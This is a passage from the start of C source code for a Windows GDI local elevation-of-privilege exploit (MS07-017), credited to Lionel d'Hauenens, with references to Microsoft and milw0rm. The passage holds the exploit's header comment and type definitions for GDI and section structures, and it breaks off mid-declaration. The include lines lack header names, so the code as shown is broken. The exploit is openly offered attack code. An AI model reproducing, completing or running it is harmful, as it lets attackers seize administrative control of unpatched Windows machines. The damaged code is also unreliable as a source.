chenjava

/* GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017) Coded by Lionel d'Hauenens http://www.labo-asso.com Development: ------------ Dev-C++ 4.9.9.2 Linked with /lib/libgdi32.a References: ----------- http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx http://research.eeye.com/html/alerts/zeroday/20061106.html http://www.milw0rm.com/exploits/3688 http://ivanlef0u.free.fr/?p=41 March 16, 2007 */ #include #include #include typedef enum _SECTION_INFORMATION_CLASS { SectionBasicInformation, SectionImageInformation } SECTION_INFORMATION_CLASS; typedef struct _SECTION_BASIC_INFORMATION { ULONG Base; ULONG Attributes; LARGE_INTEGER Size; } SECTION_BASIC_INFORMATION; typedef struct _GDI_TABLE_ENTRY { PVOID pKernelInfo; WORD ProcessID; WORD _nCount; WORD nUpper; BYTE nType; BYTE flags; PVOID pUserInfo; } GD